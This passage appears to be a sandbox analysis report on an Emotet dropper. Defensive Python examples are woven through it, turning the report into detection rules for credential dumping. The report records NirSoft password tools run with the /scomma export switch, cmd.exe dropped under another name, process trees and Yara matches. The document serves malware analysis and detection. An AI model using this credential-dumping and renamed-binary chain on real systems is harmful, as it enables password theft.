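# command lines follow the two 'Process created' entries in the report.
CLB = r"C:\Windows\SysWOW64\webservices\clb.exe"
SAMPLE_EVENTS = [
    ProcEvent(7, 1, CLB, f"'{CLB}'"),
    ProcEvent(8, 7, CLB, f"'{CLB}' /scomma 'C:\\Users\\user\\AppData\\Local\\Temp\\75A2.tmp'"),
    ProcEvent(9, 7, CLB, f"'{CLB}' /scomma 'C:\\Users\\user\\AppData\\Local\\Temp\\78FF.tmp'"),
    ProcEvent(10, 1, r"C:\Windows\System32\notepad.exe", r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'),
    ProcEvent(11, 1, r"C:\Windows\System32\reg.exe", r"reg.exe export HKLM\Software\Example C:\Users\user\AppData\Local\Temp\reg.tmp"),
]

if __name__ == "__main__":
    for pid, reasons in detect_credential_dump(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The benign reg.exe event writes to a .tmp file in Temp as well, but is not reported because the export switch is the gating condition; the path and self-spawn checks only add weight once that condition holds, which keeps the rule from firing on every process that touches the Temp directory.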
                  Yara detected Emotet
                  Source: Yara match | File source: 00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1544362683.0000000003AB0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1354873351.0000000003634000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1544062855.0000000003410000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1543973117.00000000031E0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1273574338.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1273587851.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1350179735.0000000002869000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1540221883.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 1.2.clb.exe.31e0000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.clb.exe.3ab0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.clb.exe.31e0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.clb.exe.3ab0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.clb.exe.3410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.clb.exe.3410000.4.unpack, type: UNPACKEDPE

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 00000001.00000003.1361807741.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 00000009.00000002.1357591368.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.1.clb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.2.clb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.1.clb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 1.3.clb.exe.2db0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.2.clb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Note that the first of these regions (00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp) is the same one in which the string http://www.nirsoft.net/ was found above, so the rule is matching inside the NirSoft password-recovery component the sample drops; weigh it accordingly before treating it as an independent BabyShark/KimJongRAT attribution.
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | File created: C:\Windows\SysWOW64\webservices\
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | File deleted: C:\Windows\SysWOW64\webservices\clb.exe:Zone.Identifier
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_004038A5
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_00409470
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_004010B4
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_0040C0BC
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_004099E2
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_0040B1F7
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_0040123E
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_00408325
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_004038A5
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_00409470
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_004010B4
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_0040C0BC
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_004099E2
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_0040B1F7
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_0040123E
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_00408325
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_004360CE
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040509C
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00405199
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0043C2D0
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00440406
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040451D
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_004045FF
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040458E
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00404690
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00414A51
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00404C08
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00406C8E
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00415DF3
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00416E5C
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00410FE4
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_004360CE
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0040509C
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00405199
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0043C2D0
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00440406
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0040451D
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_004045FF
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0040458E
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00404690
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00414A51
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00404C08
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00404DE5
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00404E56
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00404EC7
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00404F58
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_0040BF6B
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00404DE5
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00404E56
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00404EC7
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00404F58
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_0040BF6B
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00404880 appears 40 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00445190 appears 69 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00416849 appears 117 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00412360 appears 36 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00444C5E appears 34 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 004053C5 appears 34 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 0040924D appears 56 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00444C70 appears 39 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00412084 appears 78 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00411FF2 appears 36 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00412072 appears 32 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 004166E8 appears 64 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: String function: 00416A91 appears 170 times
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST (5 identical entries)
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (54 identical entries)
                  Source: clboe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 identical entries)
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000000.1271339987.000000000040E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274221512.0000000002D20000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274361810.0000000002E20000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274361810.0000000002E20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Binary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 00000001.00000003.1361807741.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 00000009.00000002.1357591368.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.1.clb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.2.clb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.1.clb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 1.3.clb.exe.2db0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.2.clb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: classification engine | Classification label: mal100.phis.bank.troj.spyw.evad.winEXE@16/2@0/3
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DB33F0 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,8_2_00413C19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_004039E0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,LoadLibraryExA,LoadLibraryExA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,SizeofResource,LoadLibraryExA,atoi,atoi,atoi,GetCurrentProcess,VirtualAllocExNuma,#825,#825,0_2_004039E0
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DB33F0 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Windows\SysWOW64\webservices\clb.exe | File created: C:\Users\user\AppData\Local\Temp\6F0A.tmp
Source: C:\Windows\SysWOW64\webservices\clb.exe | Command line argument: ~`@ | 7_2_00405FD0
Source: C:\Windows\SysWOW64\webservices\clb.exe | Command line argument: ~`@ | 7_1_00405FD0
Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\webservices\clb.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: clb.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: clb.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: clb.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: clb.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: clb.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: clb.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe C:\Windows\SysWOW64\webservices\clb.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clboe.exe 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe C:\Windows\SysWOW64\webservices\clb.exe
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clboe.exe 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\webservices\clb.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPC
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: clb.exe
Source: Binary string: cmd.pdbUGP source: clb.exe, 00000001.00000003.1361352227.000000000364D000.00000004.00000001.sdmp, clboe.exe, 0000000A.00000000.1358615647.00007FF6585CE000.00000002.00020000.sdmp, clboe.exe.1.dr
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: clb.exe
Source: Binary string: cmd.pdb source: clb.exe, 00000001.00000003.1361352227.000000000364D000.00000004.00000001.sdmp, clboe.exe, 0000000A.00000000.1358615647.00007FF6585CE000.00000002.00020000.sdmp, clboe.exe.1.dr
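The process tree above shows clb.exe re-launching its own image with a .tmp path as argument and, twice, with the /scomma switch that NirSoft's command-line password tools use to export recovered credentials to a file; the pdb strings show that clboe.exe carries cmd.pdb, i.e. it is cmd.exe dropped under another name. The Python below is an added example, not code from the report, of turning those three observations into process-creation detection logic. It assumes Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, OriginalFileName); the records at the bottom are constructed from the tree above, and their OriginalFileName values are assumptions (Cmd.Exe for the dropped cmd.exe copy, empty for the Emotet modules, which the report does not give).

```python
import ntpath

# Export switches shared by NirSoft's command-line password-recovery tools
# (WebBrowserPassView, mailpv and others): each writes the recovered
# credentials to the given file instead of opening a window.
NIRSOFT_EXPORT_SWITCHES = {"/stext", "/stab", "/scomma", "/shtml", "/sverhtml", "/sxml"}


def suspicious_process(ev):
    """Return the reasons a process-creation record resembles this module chain.

    `ev` carries the Sysmon Event ID 1 fields the checks need: Image,
    ParentImage, CommandLine and OriginalFileName (the name compiled into the
    binary's VERSIONINFO, which Sysmon logs next to the on-disk name)."""
    reasons = []
    image = ev.get("Image", "").lower()
    base = ntpath.basename(image)
    cmdline = ev.get("CommandLine", "").lower()

    # 1. A NirSoft export switch means credentials are being dumped to a file.
    for token in cmdline.split()[1:]:
        if token in NIRSOFT_EXPORT_SWITCHES:
            reasons.append(f"nirsoft export switch {token}")

    # 2. The name on disk no longer matches the name compiled into the binary:
    #    a system tool copied under a new name (cmd.exe dropped as clboe.exe).
    original = ev.get("OriginalFileName", "").lower()
    if original and original != base:
        reasons.append(f"renamed binary: {base} has OriginalFileName {original}")

    # 3. The process re-launches its own image with a .tmp file from the user's
    #    Temp directory as argument, the hand-off pattern in the tree above.
    parent = ev.get("ParentImage", "").lower()
    if parent == image and ".tmp" in cmdline and "\\appdata\\local\\temp\\" in cmdline:
        reasons.append("self-spawn with temp-file argument")
    return reasons


def scan(events):
    """Return {index: reasons} for every flagged record in a batch."""
    flagged = {}
    for i, ev in enumerate(events):
        reasons = suspicious_process(ev)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed records modelled on the process tree above. Sysmon records the
# command line with double quotes where the report renders single quotes.
SAMPLE_PROCS = [
    {"Image": r"C:\Windows\SysWOW64\webservices\clb.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe",
     "CommandLine": r"C:\Windows\SysWOW64\webservices\clb.exe",
     "OriginalFileName": ""},                       # assumed: not in the report
    {"Image": r"C:\Windows\SysWOW64\webservices\clb.exe",
     "ParentImage": r"C:\Windows\SysWOW64\webservices\clb.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\webservices\clb.exe" /scomma "C:\Users\user\AppData\Local\Temp\75A2.tmp"',
     "OriginalFileName": ""},                       # assumed: not in the report
    {"Image": r"C:\Windows\SysWOW64\webservices\clboe.exe",
     "ParentImage": r"C:\Windows\SysWOW64\webservices\clb.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\webservices\clboe.exe" "C:\Users\user\AppData\Local\Temp\6F0A.tmp"',
     "OriginalFileName": "Cmd.Exe"},                # assumed from the cmd.pdb string
    {"Image": r"C:\Windows\System32\cmd.exe",      # benign control record
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"',
     "OriginalFileName": "Cmd.Exe"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_PROCS).items():
        print(idx, SAMPLE_PROCS[idx]["Image"], why)
```

The OriginalFileName comparison is the check that survives renaming: the VERSIONINFO resource travels with the copied file, so clboe.exe still reports Cmd.Exe. Conversely, the first clb.exe launch is not flagged by itself; its parent is the sample, not its own image, which is why the self-spawn rule needs the temp-file condition rather than the path alone.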

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Windows\SysWOW64\webservices\clb.exe | Unpacked PE file: 7.2.clb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
Source: C:\Windows\SysWOW64\webservices\clb.exe | Unpacked PE file: 9.2.clb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
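The two rows above compare the section table of the process memory dump (7.2.clb.exe.400000.0.unpack, 9.2.clb.exe.400000.0.unpack) with the file's own headers: the unpacked payload has sections and rights the on-disk file never declared. The Python below is an added example, not part of the report, that performs that comparison on any pair of images (the on-disk file and a raw dump of the module base) using only the standard library and the DOS/NT/section headers. It also tells you when a dump has no usable MZ/PE header left, which is what the next signature (the stub overwriting its own PE header) looks like to such a tool. The two images it is fed at the bottom are constructed in the script; they are not the sample's real section tables, and the letter convention (E, R, W in that order) is this script's own.

```python
import struct

# Section-characteristic bits from winnt.h / the PE-COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
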